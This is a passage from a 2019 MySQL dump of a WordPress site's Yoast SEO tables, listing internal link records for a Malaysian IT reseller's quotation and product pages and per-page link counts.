get-quotation-canon/',1449,2737,'internal'),(7281,'https://bintara.com.my/get-quotation-canon/',1449,2737,'internal'),(2202,'https://bintara.com.my/wp-admin/profile.php',2753,0,'internal'),(14773,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14772,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14771,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14770,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14769,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14768,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14767,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14766,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14765,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14764,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14763,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14762,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14761,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14760,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14759,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14758,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14757,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14756,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14755,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14754,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14753,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14752,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14751,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14750,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14749,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14748,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(14747,'https://bintara.com.my/get-quotation-epson/',1486,2753,'internal'),(2555,'https://bintara.com.my/wp-admin/profile.php',2765,0,'internal'),(15461,'https://bintara.com.my/get-quotation-hpe/',1529,2765,'internal'),(15460,'https://bintara.com.my/get-quotation-hpe/',1529,2765,'internal'),(15459,'https://bintara.com.my/get-quotation-hpe/',1529,2765,'internal'),(15458,'https://bintara.com.my/get-quotation-hpe/',1529,2765,'internal'),(15457,'https://bintara.com.my/get-quotation-hpe/',1529,2765,'internal'),(15456,'https://bintara.com.my/get-quotation-hpe/',1529,2765,'internal'),(15455,'https://bintara.com.my/get-quotation-hpe/',1529,2765,'internal'),(15454,'https://bintara.com.my/get-quotation-hpe/',1529,2765,'internal'),(15453,'https://bintara.com.my/get-quotation-hpe/',1529,2765,'internal'),(15452,'https://bintara.com.my/get-quotation-hpe/',1529,2765,'internal'),(15451,'https://bintara.com.my/get-quotation-hpe/',1529,2765,'internal'),(15450,'https://bintara.com.my/get-quotation-hpe/',1529,2765,'internal'),(15449,'https://bintara.com.my/get-quotation-hpe/',1529,2765,'internal'),(15448,'https://bintara.com.my/get-quotation-hpe/',1529,2765,'internal'),(15447,'https://bintara.com.my/get-quotation-hpe/',1529,2765,'internal'),(2692,'https://bintara.com.my/contact-us/',1555,19,'internal'),(2693,'https://bintara.com.my/contact-us/',1555,19,'internal'),(10550,'https://bintara.com.my/contact-us/',1481,19,'internal'),(4805,'https://bintara.com.my/benq-rp704k-4k-uhd-70/',1349,1447,'internal'),(2770,'https://bintara.com.my/wp-admin/profile.php',2862,0,'internal'),(15761,'https://bintara.com.my/contact-us/',1532,19,'internal'),(15760,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15759,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15758,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15757,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15756,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15755,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15754,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15753,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15752,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15751,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15750,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15749,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15748,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15745,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15746,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15747,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(3727,'https://bintara.com.my/get-quotation-logitech/',2906,1690,'internal'),(3954,'https://bintara.com.my/logitech-connect/',16,2940,'internal'),(3953,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3952,'https://bintara.com.my/logitech-meetup/',16,2928,'internal'),(3951,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3950,'https://bintara.com.my/logitech-rally/',16,2906,'internal'),(3639,'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2.jpg',2954,0,'internal'),(3638,'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3.jpg',2954,0,'internal'),(3649,'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2.jpg',2928,0,'internal'),(3648,'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3.jpg',2928,0,'internal'),(3647,'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg',2928,0,'internal'),(3637,'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera.jpg',2954,0,'internal'),(3636,'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1.jpg',2954,0,'internal'),(3949,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3640,'https://bintara.com.my/get-quotation-logitech/',2954,1690,'internal'),(3650,'https://bintara.com.my/get-quotation-logitech/',2928,1690,'internal'),(3948,'https://bintara.com.my/logitech-group/',16,2000,'internal'),(3976,'https://bintara.com.my/get-quotation-logitech/',2972,1690,'internal'),(3947,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3977,'https://bintara.com.my/get-quotation-logitech/',3007,1690,'internal'),(4004,'https://bintara.com.my/contact-us/',1620,19,'internal'),(4003,'https://bintara.com.my/zoom/',1506,1620,'internal'),(4024,'https://bintara.com.my/contact-us/',3074,19,'internal'),(4023,'https://bintara.com.my/contact-us/',3074,19,'internal'),(4806,'https://bintara.com.my/benq',1349,2834,'internal'),(4812,'https://bintara.com.my/docusign',1374,1481,'internal'),(5238,'https://bintara.com.my/contact-us/',1446,19,'internal'),(14829,'https://bintara.com.my/contact-us/',3606,19,'internal'),(15765,'#',3654,0,'internal'),(15771,'https://bintara.com.my/dell/',3669,3661,'internal'),(15806,'javascript:void(0);',3661,0,'external'),(15805,'javascript:void(0);',3661,0,'external'),(15804,'javascript:void(0);',3661,0,'external'),(15803,'javascript:void(0);',3661,0,'external'),(15802,'javascript:void(0);',3661,0,'external'),(15807,'https://bintara.com.my/wp-admin/profile.php',3679,0,'internal'),(15995,'https://bintara.com.my/targus',3683,3686,'internal'),(16393,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16392,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16390,'https://uk.targus.com/pages/keep-your-business-your-business',3686,0,'external'),(16391,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16389,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16388,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16387,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16386,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16385,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16384,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16383,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16382,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16381,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16380,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16379,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16378,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(15996,'https://bintara.com.my/wp-admin/profile.php',3697,0,'internal'),(16377,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16376,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16375,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16374,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16373,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16372,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16371,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16370,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16369,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16368,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16367,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16362,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16366,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16365,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16364,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16363,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16361,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16360,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16359,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16358,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal'),(16357,'https://bintara.com.my/get-quotation-targus',3686,3697,'internal');
/*!40000 ALTER TABLE `wpdp_yoast_seo_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_yoast_seo_meta`
--

DROP TABLE IF EXISTS `wpdp_yoast_seo_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_yoast_seo_meta` (
  `object_id` bigint(20) unsigned NOT NULL,
  `internal_link_count` int(10) unsigned DEFAULT NULL,
  `incoming_link_count` int(10) unsigned DEFAULT NULL,
  UNIQUE KEY `object_id` (`object_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_yoast_seo_meta`
--

LOCK TABLES `wpdp_yoast_seo_meta` WRITE;
/*!40000 ALTER TABLE `wpdp_yoast_seo_meta` DISABLE KEYS */;
INSERT INTO `wpdp_yoast_seo_meta` (`object_id`, `internal_link_count`, `incoming_link_count`) VALUES (1436,1,1),(19,NULL,84),(1631,1,0),(1440,1,1),(1438,1,1),(1429,1,0),(1690,1,27),(1689,0,0),(1686,0,0),(1687,0,0),(1692,0,0),(1657,0,0),(1666,0,0),(1667,0,0),(1665,0,0),(1663,0,0),(1659,0,0),(1636,1,0),(1263,0,0),(1695,0,0),(1635,1,0),(1505,1,0),(1504,1,0),(1495,1,0),(1492,1,0),(16,27,1),(1470,1,0),(1432,1,0),(1428,1,0),(1400,1,0),(1418,1,0),(1416,1,0),(1727,0,0),(1407,1,0),(1323,1,0),(1403,1,0),(6,0,0),(1315,0,0),(1398,1,0),(1396,1,0),(1395,1,0),(1394,1,0),(1393,1,0),(1443,1,1),(1385,1,0),(1382,1,0),(1378,1,0),(1376,1,0),(1375,1,0),(1370,1,0),(1363,1,0),(1353,1,0),(1345,1,0),(1344,1,0),(1329,1,0),(1325,1,0),(1444,1,1),(1735,0,0),(1725,0,0),(1437,1,1),(1433,1,0),(1498,1,0),(1324,1,0),(1342,1,0),(1348,1,0),(1390,1,0),(1411,1,0),(1415,1,0),(1420,1,0),(1461,1,0),(1467,1,0),(1408,1,0),(1447,1,1),(1335,1,0),(1328,1,0),(1435,1,1),(1451,1,1),(1734,0,0),(1660,0,0),(1349,2,0),(1790,0,0),(1450,1,1),(1619,1,1),(1796,0,0),(1360,0,0),(1811,0,0),(1357,1,0),(1333,1,0),(1788,0,0),(1341,1,0),(1442,19,1),(1439,1,1),(1745,0,0),(1446,13,1),(1448,1,1),(1824,0,0),(1361,1,0),(1449,16,1),(1366,1,0),(1472,1,1),(1865,0,0),(1371,1,0),(1480,14,1),(1478,1,1),(1515,0,0),(1820,0,0),(1871,0,0),(1374,1,0),(1481,1,1),(1473,1,1),(1486,27,1),(1483,1,1),(1379,1,0),(1477,1,1),(1380,1,0),(1484,0,1),(1474,1,1),(1383,1,0),(1482,1,1),(1384,1,0),(1526,1,1),(1528,1,1),(1387,1,0),(1529,16,1),(1388,1,0),(1534,1,1),(1389,1,0),(1530,1,1),(1531,1,1),(1532,19,1),(1533,1,1),(1543,1,1),(1544,1,1),(1545,1,1),(1399,1,0),(1546,2,1),(1402,1,0),(1548,1,1),(1549,1,1),(1405,1,0),(1550,1,1),(1551,0,1),(1552,1,1),(1410,1,0),(1553,1,1),(1555,3,1),(1413,1,0),(1567,1,1),(1568,1,1),(1569,1,1),(1417,1,0),(1570,0,1),(1571,2,1),(1572,1,1),(1427,1,0),(1576,1,1),(1577,1,1),(1762,0,0),(1578,1,1),(1431,1,0),(1579,1,1),(1580,6,1),(1581,1,1),(1441,1,0),(1597,1,1),(1457,1,0),(1598,1,1),(1599,1,1),(1600,1,1),(1913,0,0),(1605,1,1),(1491,1,0),(1606,1,1),(1608,1,1),(1609,1,1),(1610,1,1),(1499,1,0),(1612,1,1),(1919,0,0),(1501,1,0),(1617,1,1),(1618,1,1),(1506,2,0),(1445,0,1),(1620,1,1),(1634,1,1),(1633,1,1),(1632,1,1),(1421,1,0),(1573,1,1),(1425,1,0),(1574,NULL,1),(1426,1,0),(1575,1,1),(1944,1,0),(1943,1,1),(1939,0,0),(1963,0,0),(1962,0,0),(1737,0,0),(1721,0,0),(2000,1,1),(2003,0,0),(1949,0,0),(2024,1,1),(2035,1,0),(2009,0,0),(2048,1,1),(2073,1,0),(1998,0,0),(2002,0,0),(1926,0,0),(1872,0,0),(2078,0,0),(1797,0,0),(2100,0,0),(2102,0,0),(2081,0,0),(1729,0,0),(1519,0,0),(2079,0,0),(1647,0,0),(1780,0,0),(1864,0,0),(1881,0,0),(1955,0,0),(2005,0,0),(2076,0,0),(2147,0,0),(2151,0,0),(2173,0,0),(2176,0,0),(2184,0,0),(2046,0,0),(2209,0,0),(2222,0,0),(1527,0,0),(1362,0,0),(1946,0,0),(2172,0,0),(2231,0,0),(2249,0,0),(2220,0,0),(1870,0,0),(1430,16,1),(20,0,0),(21,0,0),(22,0,0),(4,0,0),(2350,0,0),(2358,0,0),(2221,0,0),(2305,0,0),(2328,0,0),(2326,0,0),(2038,0,0),(2425,0,0),(2091,0,0),(2259,0,0),(1266,0,0),(1373,0,0),(1326,0,0),(1423,0,0),(1475,0,0),(1476,0,0),(1479,0,0),(1485,0,0),(1487,0,0),(1488,0,0),(1489,0,0),(1490,0,0),(1523,0,0),(1524,0,0),(1525,0,0),(1611,0,0),(1621,0,0),(1622,0,0),(1337,0,0),(1339,0,0),(1513,0,0),(2530,0,0),(2545,0,0),(2366,0,0),(2559,0,0),(2571,0,0),(2569,0,0),(2510,0,0),(2194,0,0),(2579,0,0),(2580,13,1),(2586,0,0),(1812,0,0),(1910,0,0),(2592,0,0),(2602,0,0),(2600,0,0),(2608,0,0),(2619,1,13),(2625,0,0),(2626,0,0),(2620,0,0),(2618,0,0),(2631,0,0),(2634,0,0),(2636,0,0),(2641,0,0),(2651,1,14),(2653,0,0),(2655,0,0),(2662,1,16),(2661,0,0),(2228,0,0),(2669,0,0),(2552,0,0),(2671,1,19),(2673,0,0),(2629,0,0),(2203,0,0),(1953,0,0),(2694,0,0),(2696,1,12),(2703,1,1),(2705,0,0),(2344,0,0),(2714,0,0),(2717,0,0),(2211,0,0),(2719,0,0),(2722,0,0),(2729,0,0),(2734,0,0),(2737,1,16),(2664,0,0),(2739,0,0),(1798,0,0),(2210,0,0),(2745,0,0),(2749,0,0),(2677,0,0),(2753,1,27),(2755,0,0),(2757,0,0),(2218,0,0),(2072,0,0),(2298,0,0),(2452,0,0),(2765,1,15),(2368,0,0),(2621,0,0),(2622,0,0),(1900,0,0),(1952,0,0),(1863,0,0),(1744,0,0),(1867,0,0),(1874,0,0),(1878,0,0),(1740,0,0),(1882,0,0),(1754,0,0),(1889,0,0),(1888,0,0),(1730,0,0),(1890,0,0),(1758,0,0),(1905,0,0),(2769,0,0),(1941,0,0),(1908,0,0),(1921,0,0),(1923,0,0),(1906,0,0),(2774,0,0),(2779,0,0),(2665,0,0),(2785,0,0),(2789,0,0),(2794,0,0),(2800,0,0),(2802,0,0),(2807,0,0),(2699,0,0),(2206,0,0),(2811,0,0),(2813,0,0),(1732,0,0),(2821,0,0),(2834,1,1),(2839,0,0),(2840,0,0),(2768,0,0),(5,0,0),(7,0,0),(9,0,0),(1300,0,0),(1295,0,0),(1301,0,0),(1302,0,0),(1250,0,0),(1252,0,0),(1261,0,0),(1262,0,0),(1264,0,0),(1265,0,0),(1255,0,0),(1258,0,0),(1259,0,0),(18,0,0),(1248,0,0),(1257,0,0),(17,0,0),(1270,0,0),(1272,0,0),(1276,0,0),(1283,0,0),(1286,0,0),(1291,0,0),(1292,0,0),(1293,0,0),(1294,0,0),(1298,0,0),(1299,0,0),(1307,0,0),(1308,0,0),(1309,0,0),(1312,0,0),(1317,0,0),(1320,0,0),(1322,0,0),(1330,0,0),(1331,0,0),(1338,0,0),(1340,0,0),(1343,0,0),(1350,0,0),(1351,0,0),(1377,0,0),(1500,0,0),(1503,0,0),(1726,0,0),(1728,0,0),(1731,0,0),(2771,0,0),(1846,0,0),(1847,0,0),(1848,0,0),(1850,0,0),(1853,0,0),(1979,0,0),(1982,0,0),(1984,0,0),(1986,0,0),(1987,0,0),(1989,0,0),(1991,0,0),(1993,0,0),(1995,0,0),(1996,0,0),(2021,0,0),(2108,0,0),(2044,0,0),(1559,0,0),(1547,0,0),(2097,0,0),(2837,0,0),(2838,0,0),(2833,0,0),(2616,0,0),(2695,0,0),(2226,0,0),(2850,0,0),(2862,1,18),(2864,0,0),(2866,0,0),(2869,0,0),(2872,0,0),(2143,0,0),(2883,0,0),(2884,0,0),(2885,1,1),(2887,0,0),(2083,0,0),(2891,0,0),(2890,0,0),(2899,0,0),(2906,1,1),(2908,0,0),(2897,0,0),(2919,0,0),(2921,0,0),(2849,0,0),(2925,0,0),(2924,0,0),(2928,4,1),(2931,0,0),(2938,0,0),(2940,0,1),(2949,0,0),(2954,5,1),(2956,0,0),(2951,0,0),(2964,0,0),(2967,0,0),(2972,1,1),(2979,0,0),(2987,0,0),(2991,0,0),(2998,0,0),(2999,0,0),(3001,0,0),(3007,1,0),(3008,0,0),(3020,0,0),(3009,0,0),(3031,0,0),(2926,0,0),(2144,0,0),(3050,0,0),(3053,0,0),(3056,1,1),(2905,0,0),(3047,0,0),(3065,0,0),(3010,0,0),(3068,0,0),(3069,0,0),(3070,0,0),(3072,0,0),(3074,2,0),(3076,0,0),(3077,0,0),(3086,0,0),(3088,0,0),(3071,0,0),(3091,0,0),(3093,0,0),(1287,0,0),(2743,0,0),(2114,0,0),(1664,0,0),(3090,0,0),(3208,0,0),(3209,0,0),(3210,0,0),(3211,0,0),(3213,0,0),(3212,0,0),(3214,0,0),(3216,0,0),(3215,0,0),(3217,0,0),(3218,0,0),(3219,0,0),(1860,0,0),(3222,0,0),(1,0,0),(1310,0,0),(1356,0,0),(2809,0,0),(3268,0,0),(3271,0,0),(3275,0,0),(3277,0,0),(2815,0,0),(3288,0,0),(3296,0,0),(3308,0,0),(3312,0,0),(3315,0,0),(3319,0,0),(3321,0,0),(3323,0,0),(3331,0,0),(3334,0,0),(3337,0,0),(3381,0,0),(2744,0,0),(3445,0,0),(3448,0,0),(3451,0,0),(3479,0,0),(3481,0,0),(3483,0,0),(3485,0,0),(3491,0,0),(3502,0,0),(3506,1,0),(3261,0,0),(3207,0,0),(2762,0,0),(2300,0,0),(3602,0,0),(3605,0,0),(3606,1,1),(3614,0,0),(3610,0,0),(3609,0,0),(3608,0,0),(3607,0,0),(3618,0,0),(2847,0,0),(3623,0,0),(3627,0,0),(2764,0,0),(3630,0,0),(2372,0,0),(2554,0,0),(2289,0,0),(3643,0,0),(3646,0,0),(3601,0,0),(3540,0,0),(3645,0,0),(3250,0,0),(3252,0,0),(3253,0,0),(3258,0,0),(3260,0,0),(3654,1,0),(3655,0,0),(3656,0,0),(3657,0,0),(3661,0,1),(3666,0,0),(3669,1,0),(3671,0,0),(3509,0,0),(3512,0,0),(3513,0,0),(3514,0,0),(3674,0,0),(3677,0,0),(3679,1,0),(3683,1,0),(3541,0,0),(3542,0,0),(3686,36,1),(3684,0,0),(3599,0,0),(3603,0,0),(3604,0,0),(3653,0,0),(3662,0,0),(3652,0,0),(3689,0,0),(3692,0,0),(3694,0,0),(3697,1,36),(3699,0,0),(3703,0,0),(3690,0,0),(3696,0,0);
/*!40000 ALTER TABLE `wpdp_yoast_seo_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Dumping routines for database 'norfaiz_wp527'
--
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2019-11-15  1:48:33
